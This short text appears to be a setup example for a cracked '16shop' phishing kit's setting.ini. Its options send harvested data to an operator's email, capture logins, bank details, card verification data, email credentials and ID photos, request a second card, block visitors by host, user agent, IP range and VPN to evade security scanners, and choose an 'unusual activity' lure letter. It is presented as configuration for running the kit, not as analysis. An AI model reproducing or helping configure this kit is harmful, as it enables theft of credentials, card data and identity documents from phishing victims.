


This is how to set custom setting.ini,use your brain.



email_result = "your mail"
lock_platform = ""
sender_mail = "admin@16shop.co"
site_parameter = "CrackedByEveryday"
site_password = "CrackedByEveryday"
site_param_on = "off"
site_pass_on = ""
send_login = "on"
get_photo = "on"
get_vbv = "on"
get_email = "on"
get_bank = "on"
onetime = ""
block_host = "on"
block_ua = "on"
block_iprange = "on"
block_isp = ""
block_vpn = "on"
letter = "unusual_activity"
double_cc = "on"
block_referrer = ""